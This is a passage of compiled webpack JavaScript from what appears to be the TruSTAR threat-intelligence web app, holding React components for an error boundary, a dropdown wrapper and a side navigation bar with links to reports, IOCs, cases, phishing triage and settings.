    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(ErrorBoundary, [{
    key: 'componentDidCatch',
    value: function componentDidCatch(error, errorInfo) {
      // Catch errors in any components below and re-render with error message
      this.setState({
        error: error,
        errorInfo: errorInfo
      });

      //  TODO_LOG if (process.env.NODE_ENV !== 'test') {
      //  TODO_LOG   Raven.captureException(error, { extra: { errorInfo } });
      //  TODO_LOG }
    }
  }, {
    key: 'render',
    value: function render() {
      // Error path
      if (this.state.errorInfo) {
        return this.props.renderFallback
        // $FlowFixMe: Sigh... how can we convince flow that error and errorInfo are defined together?
        ? this.props.renderFallback(this.state.error, this.state.errorInfo) : this.renderDefaultFallback();
      }

      // Normally, just render children
      return this.props.children;
    }
  }]);

  return ErrorBoundary;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);

/***/ }),
/* 1489 */,
/* 1490 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return DropdownWrap; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return DropdownWrapMenuItem; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_types__ = __webpack_require__(97);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_reactstrap__ = __webpack_require__(59);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_rxjs_util_noop__ = __webpack_require__(251);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_rxjs_util_noop___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_7_rxjs_util_noop__);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }





var debug = __WEBPACK_IMPORTED_MODULE_3_debug___default()('app:components:DropdownWrap'); // eslint-disable-line no-unused-vars





// Style for Main Components (things you may export)
var StyledDropdownWrap = __WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */].div.withConfig({
  displayName: 'DropdownWrap__StyledDropdownWrap',
  componentId: 'sc-13rmgrv-0'
})(['.dropdown .dropdown-menu{min-width:1rem;padding:0;', ';&.show{margin:0;}> *{width:100%;user-select:none;}}'], function (_ref) {
  var menuBorderStyle = _ref.menuBorderStyle;
  return menuBorderStyle && Object(__WEBPACK_IMPORTED_MODULE_2_styled_components__["b" /* css */])(['border:', ';'], menuBorderStyle);
});

var initialValues = {
  dropdownOpen: false,
  direction: 'down'
};

// Bindings

var DropdownWrap = function (_Component) {
  _inherits(DropdownWrap, _Component);

  function DropdownWrap() {
    var _ref2;

    var _temp, _this, _ret;

    _classCallCheck(this, DropdownWrap);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref2 = DropdownWrap.__proto__ || Object.getPrototypeOf(DropdownWrap)).call.apply(_ref2, [this].concat(args))), _this), _this.state = {
      dropdownOpen: false,
      mouseInMenu: false
    }, _this.openDropdown = function () {
      _this.setState(function (prevState) {
        return {
          dropdownOpen: true
        };
      });
    }, _this.closeDropdown = function () {
      _this.setState(function (prevState) {
        return {
          dropdownOpen: false
        };
      });
    }, _this.toggle = function () {
      _this.setState(function (prevState) {
        return {
          dropdownOpen: !prevState.dropdownOpen
        };
      });
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(DropdownWrap, [{
    key: 'render',

    //  ----Template----

    value: function render() {
      var _this2 = this;

      /**
       * If you have both openOnHover and openOnClick, openOnHover takes precedence
       */
      var _props = this.props,
          openOnHover = _props.openOnHover,
          openOnClick = _props.openOnClick,
          dropdownItemContainerBorderStyle = _props.dropdownItemContainerBorderStyle;


      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        StyledDropdownWrap,
        { menuBorderStyle: dropdownItemContainerBorderStyle },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          __WEBPACK_IMPORTED_MODULE_5_reactstrap__["Dropdown"],
          {
            direction: this.props.direction,
            isOpen: this.state.dropdownOpen,
            toggle: openOnClick && !openOnHover ? this.toggle : __WEBPACK_IMPORTED_MODULE_7_rxjs_util_noop__["noop"],
            'data-cy': this.props.dropdownCyId
          },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            __WEBPACK_IMPORTED_MODULE_5_reactstrap__["DropdownToggle"],
            { tag: 'div', onMouseEnter: openOnHover ? this.openDropdown : null, onMouseLeave: openOnHover ? this.closeDropdown : null },
            this.props.children
          ),
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            __WEBPACK_IMPORTED_MODULE_5_reactstrap__["DropdownMenu"],
            { 'data-cy': this.props.dropdownMenuCyId },
            this.props.menuItems.map(function (Item) {
              return __WEBPACK_IMPORTED_MODULE_0_react___default.a.cloneElement(Item, {
                onClick: _this2.closeDropdown
              });
            })
          )
        )
      );
    } // ----Methods----

  }]);

  return DropdownWrap;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);

// Logic & Helper Components


DropdownWrap.defaultProps = initialValues;
var StyledMenuItem = __WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */].div.withConfig({
  displayName: 'DropdownWrap__StyledMenuItem',
  componentId: 'sc-13rmgrv-1'
})(['border:0;padding:', ';font-size:', ';cursor:pointer;background-color:', ';& > a{color:', ';}'], function (props) {
  return props.noPadding ? 'initial' : '0.5rem 2rem';
}, function (_ref3) {
  var theme = _ref3.theme;
  return theme.FontSizes.P;
}, function (_ref4) {
  var theme = _ref4.theme;
  return theme.ThemeColors.SURFACE_LIGHTER.X700;
}, function (_ref5) {
  var theme = _ref5.theme;
  return theme.ThemeColors.TEXT.hex;
});
var DropdownWrapMenuItem = function DropdownWrapMenuItem(props) {
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    StyledMenuItem,
    { noPadding: props.noPadding },
    props.children
  );
};



/***/ }),
/* 1491 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_types__ = __webpack_require__(97);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_rxjs_util_noop__ = __webpack_require__(251);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_rxjs_util_noop___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_rxjs_util_noop__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_react_router__ = __webpack_require__(98);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__ = __webpack_require__(42);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__components_DropdownWrap__ = __webpack_require__(1490);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_modules_marketplace_actions__ = __webpack_require__(1321);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_modules_app__ = __webpack_require__(179);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_modules_chat__ = __webpack_require__(1296);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13_modules_profile__ = __webpack_require__(140);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14_modules_router_getters__ = __webpack_require__(912);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_15_modules_app_constants__ = __webpack_require__(172);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_16__SideMenuLink__ = __webpack_require__(3675);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_17_trustar_2_0_containers_features__ = __webpack_require__(876);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_18_modules_features__ = __webpack_require__(181);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_19__modals_SlackCommunityChatModal__ = __webpack_require__(3678);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_20_trustar_utils_constants__ = __webpack_require__(559);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }





var debug = __WEBPACK_IMPORTED_MODULE_3_debug___default()('app:components:Browse'); // eslint-disable-line no-unused-vars


















// Style for Main Components (things you may export)
var StyledBrowse = __WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */].div.withConfig({
  displayName: 'Browse__StyledBrowse',
  componentId: 'oqnint-0'
})(['display:flex;height:100%;flex-direction:column;background:', ';justify-content:space-between;'], function (_ref) {
  var theme = _ref.theme;
  return theme.ThemeColors.SIDE_NAV_BAR.hex;
});

var StyledNavBar = __WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */].div.withConfig({
  displayName: 'Browse__StyledNavBar',
  componentId: 'oqnint-1'
})(['background:', ';color:white;border:1px solid ', ';.dropdown .dropdown-menu{border-radius:3px;border-width:0px;box-shadow:1px 1px 0px 1px ', ';button{background:', ';}}'], function (_ref2) {
  var theme = _ref2.theme;
  return theme.ThemeColors.SIDE_NAV_BAR.hex;
}, function (_ref3) {
  var theme = _ref3.theme;
  return theme.ThemeColors.SIDE_NAV_BAR.hex;
}, function (_ref4) {
  var theme = _ref4.theme;
  return theme.ThemeColors.SIDE_NAV_DROPRIGHT_MENU_ITEM.SHADOW;
}, function (_ref5) {
  var theme = _ref5.theme;
  return theme.ThemeColors.SIDE_NAV_DROPRIGHT_MENU_ITEM.BACKGROUND;
});

var NavLinkStyles = Object(__WEBPACK_IMPORTED_MODULE_2_styled_components__["b" /* css */])(['display:flex;justify-content:center;align-items:center;text-decoration:none;width:', ';height:', ';flex-grow:0;flex-shrink:0;cursor:pointer;border-bottom:1px solid ', ';&.empty{pointer-events:none;}&:hover,&.active{.icon{background:', ';}}&[name=\'Tour\'],&[name=\'IOCs\']{.icon{padding:0.7rem;font-size:2.65rem;}}&[name=\'Reports\']{.icon{padding:1rem 1.25rem;}}&[name=\'User Settings\']{.icon{padding:0.85rem;font-size:2.35rem;}}&[name=\'Cases\'],&[name=\'Phishing Triage\']{.icon{padding:0.85rem;font-size:2.45rem;}}&[name=\'Workflows\']{.icon{padding:0.85rem;font-size:2.6rem;}}.icon{margin:0;padding:1rem;color:white;font-size:2rem;}'], function (_ref6) {
  var theme = _ref6.theme;
  return theme.Widths.SIDE_NAV_WIDTH;
}, function (_ref7) {
  var theme = _ref7.theme;
  return theme.Widths.SIDE_NAV_WIDTH;
}, function (_ref8) {
  var theme = _ref8.theme;
  return theme.ThemeColors.SIDE_NAV_BAR.hex;
}, function (_ref9) {
  var theme = _ref9.theme;
  return theme.ThemeColors.SIDE_NAV_BAR_HOVER.hex;
});

var StyledNavLink = Object(__WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_6_react_router__["Link"]).withConfig({
  displayName: 'Browse__StyledNavLink',
  componentId: 'oqnint-2'
})(['', ''], NavLinkStyles);

var StyledNavAnchor = __WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */].a.withConfig({
  displayName: 'Browse__StyledNavAnchor',
  componentId: 'oqnint-3'
})(['', ''], NavLinkStyles);

var initialValues = {
  onRegisterClick: __WEBPACK_IMPORTED_MODULE_5_rxjs_util_noop__["noop"]
};

// Bindings

var Browse = function (_Component) {
  _inherits(Browse, _Component);

  function Browse() {
    var _ref10;

    var _temp, _this, _ret;

    _classCallCheck(this, Browse);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref10 = Browse.__proto__ || Object.getPrototypeOf(Browse)).call.apply(_ref10, [this].concat(args))), _this), _this.state = {
      slackCommunityModalOpen: false
      //  ----Template----

    }, _this.toggleSlackCommunityModal = function (hardSetToggleValue) {
      var newState = hardSetToggleValue === true || hardSetToggleValue === false ? hardSetToggleValue : !_this.state.slackCommunityModalOpen;
      _this.setState({ slackCommunityModalOpen: newState });
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(Browse, [{
    key: 'render',
    value: function render() {
      var _this2 = this;

      var _props = this.props,
          theme = _props.theme,
          isTrialUser = _props.isTrialUser,
          currentBaseRoute = _props.currentBaseRoute;


      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        StyledBrowse,
        null,
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          StyledNavBar,
          null,
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(NavLink, {
            name: 'Reports',
            to: '/browse/reports',
            selector: 'ReportsTab',
            icon: __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["o" /* Icon */], { icon: __WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["s" /* IconLookup */].REPORTS_ICON })
          }),
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(NavLink, {
            name: 'IOCs',
            to: '/browse/iocs',
            selector: 'IndicatorsTab',
            icon: __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["o" /* Icon */], { icon: __WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["s" /* IconLookup */].NAVBAR_IOC })
          }),
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            __WEBPACK_IMPORTED_MODULE_17_trustar_2_0_containers_features__["b" /* ToggleFeature */],
            {
              feature: __WEBPACK_IMPORTED_MODULE_18_modules_features__["c" /* flags */].CASES_VIEW_ENABLED,
              match: __WEBPACK_IMPORTED_MODULE_18_modules_features__["e" /* treatments */].ON },
            __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(NavLink, {
              name: 'Cases',
              to: '/browse/cases',
              selector: 'CasesTab',
              icon: __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["o" /* Icon */], { icon: __WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["s" /* IconLookup */].NAVBAR_CASES })
            })
          ),
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            __WEBPACK_IMPORTED_MODULE_17_trustar_2_0_containers_features__["b" /* ToggleFeature */],
            {
              feature: __WEBPACK_IMPORTED_MODULE_18_modules_features__["c" /* flags */].PHISHING_TRIAGE_ENABLED,
              match: __WEBPACK_IMPORTED_MODULE_18_modules_features__["e" /* treatments */].ON },
            __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(NavLink, {
              name: 'Phishing Triage',
              to: '/phishing',
              selector: 'PhishingLink',
              icon: __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["o" /* Icon */], { icon: __WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["s" /* IconLookup */].PHISHING })
            })
          ),
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            __WEBPACK_IMPORTED_MODULE_17_trustar_2_0_containers_features__["b" /* ToggleFeature */],
            {
              feature: __WEBPACK_IMPORTED_MODULE_18_modules_features__["c" /* flags */].WORKFLOWS_ENABLED,
              match: __WEBPACK_IMPORTED_MODULE_18_modules_features__["e" /* treatments */].ON },
            __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(NavLink, {
              name: 'Workflows',
              href: __WEBPACK_IMPORTED_MODULE_20_trustar_utils_constants__["e" /* TRUSTAR_WORKFLOWS_LOCALHOST */] ? __WEBPACK_IMPORTED_MODULE_20_trustar_utils_constants__["e" /* TRUSTAR_WORKFLOWS_LOCALHOST */] : '/workflows',
              selector: 'WorkflowsLink',
              icon: __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["o" /* Icon */], { icon: __WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["s" /* IconLookup */].WORKFLOWS })
            })
          )
        ),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          StyledNavBar,
          null,
          isTrialUser && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(NavLink, {
            name: 'Upgrade',
            href: 'https://www.trustar.co/community-plus',
            selector: 'UpgradeTab',
            rel: 'noopener noreferrer',
            target: '_blank',
            icon: __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["o" /* Icon */], { icon: __WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["s" /* IconLookup */].GIFT })
          }),
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(NavLink, {
            name: 'Marketplace',
            to: '/browse/marketplace',
            selector: 'MarketplaceTab',
            onClick: this.props.onRegisterClick,
            icon: __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["o" /* Icon */], { icon: __WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["s" /* IconLookup */].NAVBAR_MARKETPLACE })
          }),
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            __WEBPACK_IMPORTED_MODULE_17_trustar_2_0_containers_features__["b" /* ToggleFeature */],
            {
              feature: __WEBPACK_IMPORTED_MODULE_18_modules_features__["c" /* flags */].CHAT_ENABLED,
              match: __WEBPACK_IMPORTED_MODULE_18_modules_features__["e" /* treatments */].ON },
            __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(ChatboxNavLink, { onClick: this.toggleSlackCommunityModal })
          ),
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(ClickableNavLinkWithMenu, {
            name: 'Support',
            icon: __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["o" /* Icon */], { icon: __WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["s" /* IconLookup */].LIFEBUOY }),
            menuItems: SupportOptions,
            isActive: currentBaseRoute === 'pages'
          }),
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(ClickableNavLinkWithMenu, {
            name: 'User Settings',
            icon: __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["o" /* Icon */], { icon: __WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["s" /* IconLookup */].NAVBAR_USER }),
            menuItems: SettingsOptions,
            isActive: currentBaseRoute === 'settings'
          })
        ),
        this.props.children,
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_19__modals_SlackCommunityChatModal__["a" /* SlackCommunityChatModal */], { isOpen: this.state.slackCommunityModalOpen, onExitModal: function onExitModal() {
            return _this2.toggleSlackCommunityModal(false);
          } })
      );
    }

    // ----Methods----

    // Toggle the modal on/off, if you want to explicitly set the value of the modal's visibility provide a true/false param

  }]);

  return Browse;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);

// Logic & Helper Components

Browse.defaultProps = initialValues;
var StyledNavBarTooltip = __WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */].span.withConfig({
  displayName: 'Browse__StyledNavBarTooltip',
  componentId: 'oqnint-4'
})(['background:', ';color:white;padding:0.1rem 0.5rem;border-radius:0.25rem;'], function (_ref11) {
  var theme = _ref11.theme;
  return theme.ThemeColors.DARK.hex;
});

var NavLink = function NavLink(props) {
  var preventTooltip = props.preventTooltip,
      name = props.name,
      icon = props.icon,
      children = props.children,
      to = props.to,
      href = props.href,
      otherProps = _objectWithoutProperties(props, ['preventTooltip', 'name', 'icon', 'children', 'to', 'href']);

  var id = (name || '').replace(' ', '');
  var ariaLabel = name + ' Nav Link';
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    __WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["C" /* TooltipWrapper */],
    {
      preventOpen: preventTooltip,
      id: id,
      delay: { show: 325, hide: 125 },
      tooltip: __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        StyledNavBarTooltip,
        null,
        ' ',
        props.name
      ) },
    to ? __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      StyledNavLink,
      _extends({
        to: to,
        name: name,
        'aria-label': ariaLabel,
        'data-selector': props.selector,
        'data-cy': props.selector,
        activeClassName: 'active'
      }, otherProps),
      icon,
      children
    ) : __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      StyledNavAnchor,
      _extends({
        href: href,
        name: name,
        'data-selector': props.selector,
        'aria-label': ariaLabel,
        'data-cy': props.selector,
        activeClassName: 'active'
      }, otherProps),
      icon,
      children
    )
  );
};

var ChatboxNavLink = function ChatboxNavLink(props) {
  var onClick = props.onClick;

  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(NavLink, {
    name: 'TruSTAR Community',
    'data-cy': 'ChatToggleTab',
    onClick: onClick,
    icon: __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["o" /* Icon */], { icon: __WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["s" /* IconLookup */].BUBBLE_TEXT })
  });
};

var SettingsOptions = Object(__WEBPACK_IMPORTED_MODULE_7_immutable__["List"])([__WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
  __WEBPACK_IMPORTED_MODULE_9__components_DropdownWrap__["b" /* DropdownWrapMenuItem */],
  { noPadding: true, key: 1 },
  __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    __WEBPACK_IMPORTED_MODULE_16__SideMenuLink__["a" /* SideMenuLink */],
    { 'data-cy': 'SettingsPageMenuLink', activeClassName: 'active', to: '/settings' },
    'Settings'
  )
), __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
  __WEBPACK_IMPORTED_MODULE_9__components_DropdownWrap__["b" /* DropdownWrapMenuItem */],
  { noPadding: true, key: 2 },
  __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    __WEBPACK_IMPORTED_MODULE_16__SideMenuLink__["a" /* SideMenuLink */],
    { 'data-cy': 'LogoutMenuLink', href: __WEBPACK_IMPORTED_MODULE_15_modules_app_constants__["LOGOUT_ENDPOINT_AUTHPATH"] },
    'Logout'
  )
)]);

var SupportOptions = Object(__WEBPACK_IMPORTED_MODULE_7_immutable__["List"])([__WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
  __WEBPACK_IMPORTED_MODULE_9__components_DropdownWrap__["b" /* DropdownWrapMenuItem */],
  { noPadding: true, key: 3 },
  __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    __WEBPACK_IMPORTED_MODULE_16__SideMenuLink__["a" /* SideMenuLink */],
    { 'data-cy': 'SupportPageMenuLink', href: 'https://docs.splunk.com/Documentation/SIM/current/Intro/Help', target: '_blank' },
    'Support'
  )
), __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
  __WEBPACK_IMPORTED_MODULE_9__components_DropdownWrap__["b" /* DropdownWrapMenuItem */],
  { noPadding: true, key: 1 },
  __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    __WEBPACK_IMPORTED_MODULE_16__SideMenuLink__["a" /* SideMenuLink */],
    { 'data-cy': 'HelpPageMenuLink', to: '/pages/help' },
    'FAQ'
  )
), __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
  __WEBPACK_IMPORTED_MODULE_9__components_DropdownWrap__["b" /* DropdownWrapMenuItem */],
  { noPadding: true, key: 2 },
  __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    __WEBPACK_IMPORTED_MODULE_16__SideMenuLink__["a" /* SideMenuLink */],
    {
      'data-cy': 'TermsPageMenuLink',
      href: 'https://www.trustar.co/terms-of-use',
      target: '_blank' },
    'Terms Of Use'
  )
)]);

var ClickableNavLinkWithMenu = function ClickableNavLinkWithMenu(props) {
  var menuItems = props.menuItems,
      name = props.name,
      icon = props.icon;

  var identifier = name.replace(/\s/g, '') + 'MenuPopout'; // Ensure no spaces
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    __WEBPACK_IMPORTED_MODULE_9__components_DropdownWrap__["a" /* DropdownWrap */],
    { direction: 'right', menuItems: menuItems, openOnClick: true },
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(NavLink, {
      name: name,
      selector: identifier,
      className: props.isActive ? 'active' : null,
      preventTooltip: false,
      icon: icon
    })
  );
};

// All we need to know from state right now is whether chat is open
var mapState = function mapState(state) {
  return {
    currentBaseRoute: Object(__WEBPACK_IMPORTED_MODULE_14_modules_router_getters__["a" /* currentBaseRoute */])(state),
    isTrialUser: __WEBPACK_IMPORTED_MODULE_13_modules_profile__["getters"].isTrialUser(state)
  };
};

var dispatchProps = {
  onRegisterClick: __WEBPACK_IMPORTED_MODULE_10_modules_marketplace_actions__["registerActivity"],
  confirm: __WEBPACK_IMPORTED_MODULE_11_modules_app__["actions"].confirm
};

/* harmony default export */ __webpack_exports__["default"] = (Object(__WEBPACK_IMPORTED_MODULE_1_react_redux__["connect"])(mapState, dispatchProps)(Browse));

/***/ }),
/* 1492 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return FeatureVerificationComponent; });
/* unused harmony export AccessDeniedComponent */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return FeatureNotEnabledView; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);



/*
